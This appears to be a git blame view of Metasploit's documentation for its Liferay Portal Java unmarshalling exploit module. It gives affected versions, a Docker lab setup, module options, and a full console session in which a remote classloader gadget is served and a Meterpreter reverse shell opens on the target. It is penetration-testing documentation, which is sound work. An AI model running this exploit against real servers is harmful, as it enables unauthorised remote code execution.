adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
e78babea90465954268ce9cb28c699b5cf817841
metasploit-gs/documentation/modules/exploit/multi/http/liferay_java_unmarshalling.md
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

119 lines
4.3 KiB
Markdown
Raw Normal View History

Add module doc
2020-04-08 18:20:25 -05:00
## Vulnerable Application
### Description
This module exploits a Java unmarshalling vulnerability via JSONWS in
Update post-RuboCop style in my recent modules
2020-04-22 10:44:07 -05:00
Liferay Portal versions < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, and 7.2.1
GA2 to execute code as the Liferay user. Tested against 7.2.0 GA1.
Add module doc
2020-04-08 18:20:25 -05:00
### Setup
Add note about installing Docker
2020-04-14 21:19:54 -05:00
Install Docker using the [official instructions](https://docs.docker.com/get-docker/).
Follow the instructions for your platform and distribution (if using
Linux). If you're using OS X, you may prefer to `brew cask install docker`
after installing [Homebrew](https://brew.sh/).
Add note to doc about Liferay being a memory hog
2020-04-14 16:01:52 -05:00
**Note:** You may want to increase Docker's memory capacity up to 4 GB.
Liferay will crash at 2 GB or less. 4 GB seems to be the sweet spot.
Add module doc
2020-04-08 18:20:25 -05:00
Run `docker run -it -p 8080:8080 liferay/portal:7.2.0-ga1` (note the
added `7.2.0-ga1` tag) as per Liferay's [Docker Hub instructions](https://hub.docker.com/r/liferay/portal).
Add note about installing Docker
2020-04-14 21:19:54 -05:00
Any dependencies will be pulled automatically.
Add module doc
2020-04-08 18:20:25 -05:00
## Verification Steps
Follow [Setup](#setup) and [Scenarios](#scenarios).
Update my module documentation to the new standard
2020-04-20 20:06:52 -05:00
## Targets
### 0
This targets Liferay Portal versions < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4,
and 7.2.1 GA2.
Add module doc
2020-04-08 18:20:25 -05:00
## Options
### SRVPORT
If you are testing the [Docker container](#setup), which binds to port
Reword sentence to avoid "too" many "to"s
2020-04-14 21:28:41 -05:00
8080 by default, set this to a different port to avoid a port conflict
with the remote classloading server.
Add module doc
2020-04-08 18:20:25 -05:00
## Scenarios
### Liferay Portal 7.2.0 GA1 from [Docker Hub](https://hub.docker.com/r/liferay/portal)
```
msf5 > use exploit/multi/http/liferay_java_unmarshalling
Switch back to options (show options) in doc
2020-04-14 22:24:01 -05:00
msf5 exploit(multi/http/liferay_java_unmarshalling) > options
Add module doc
2020-04-08 18:20:25 -05:00
Module options (exploit/multi/http/liferay_java_unmarshalling):
Switch back to options (show options) in doc
2020-04-14 22:24:01 -05:00
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 8080 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes Base path
VHOST no HTTP server virtual host
Add module doc
2020-04-08 18:20:25 -05:00
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
Switch back to options (show options) in doc
2020-04-14 22:24:01 -05:00
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Liferay Portal < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, 7.2.1 GA2
Add module doc
2020-04-08 18:20:25 -05:00
msf5 exploit(multi/http/liferay_java_unmarshalling) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 exploit(multi/http/liferay_java_unmarshalling) > set lhost 192.168.1.3
lhost => 192.168.1.3
msf5 exploit(multi/http/liferay_java_unmarshalling) > set srvport 8888
srvport => 8888
msf5 exploit(multi/http/liferay_java_unmarshalling) > run
[*] Started reverse TCP handler on 192.168.1.3:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Liferay 7.2.0 CE GA1 MAY be a vulnerable version. Please verify.
[*] Using URL: http://0.0.0.0:8888/
[*] Local IP: http://192.168.1.3:8888/
Be more verbose and validate classloader server
2020-04-13 15:18:02 -05:00
[+] Started remote classloader server at http://192.168.1.3:8888/
Update print and comments
2020-04-14 23:06:27 -05:00
[*] Sending remote classloader gadget to http://127.0.0.1:8080/api/jsonws/expandocolumn/update-column
Add module doc
2020-04-08 18:20:25 -05:00
[*] GET /Uphxohekruuokpedknflsriuafhrdsfk.class requested
Rename exploit_class to constructor_class
2020-04-10 02:13:46 -05:00
[+] Sending constructor class
Add module doc
2020-04-08 18:20:25 -05:00
[*] GET /metasploit/Payload.class requested
[+] Sending payload class
[*] HEAD /metasploit.dat requested
[+] Sending 200
[*] GET /metasploit.dat requested
[+] Sending payload config
[*] HEAD /metasploit/Payload.class requested
[+] Sending 200
[*] GET /metasploit/Payload.class requested
[+] Sending payload class
[*] Sending stage (53928 bytes) to 192.168.1.3
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.3:58271) at 2020-04-08 07:05:47 -0500
[*] Server stopped.
meterpreter > getuid
Server username: liferay
meterpreter > sysinfo
Computer : 588a96d744cb
OS : Linux 4.19.76-linuxkit (amd64)
Meterpreter : java/linux
meterpreter >
```
Reference in New Issue Copy Permalink